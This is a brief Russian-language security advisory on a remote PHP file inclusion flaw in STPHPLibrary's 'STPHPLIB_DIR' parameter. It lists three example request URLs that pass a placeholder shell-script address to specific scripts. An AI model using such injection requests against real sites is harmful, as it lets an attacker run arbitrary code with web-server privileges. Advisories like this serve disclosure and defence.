Программа: STPHPLibrary

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «STPHPLIB_DIR» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

stphpapplication.php?STPHPLIB_DIR=[[Sh3LLScript]]
stphpbtnimage.php?STPHPLIB_DIR=[[Sh3LLScript]]
stphpform.php?STPHPLIB_DIR=[[Sh3LLScript]]



Оставить мнение